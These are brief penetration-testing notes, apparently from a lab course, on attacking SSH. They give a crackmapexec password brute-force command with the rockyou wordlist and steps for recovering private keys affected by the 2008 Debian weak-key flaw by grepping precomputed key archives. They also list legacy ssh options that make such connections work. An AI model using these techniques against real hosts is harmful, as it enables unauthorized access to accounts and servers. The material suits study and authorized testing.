Previous
- Bruteforcing credentials using
crackmapexec ssh 10.11.1.251 -u <user> -p /usr/share/wordlists/rockyou.txt
- If machine is running on very old linux , and in 2008 , ssh public and private keys are publically available . since authorized_key has public key , it can be used to find private key
- cd debian-ssh/common_keys/
- tar -vjxf debian_ssh_dsa_1024_x86.tar.bz2
- grep -lr “<20 charac from authorizedkey>”
- if there is any error try
- configure /etc/ssh/ssh_config
- add line in the end PubkeyAcceptedKeyTypes +ssh-dss
- use arguments like this with ssh command if there is any error
-oKexAlgorithms=+diffie-hellman-group1-sha1 -oHostKeyAlgorithms=+ssh-dss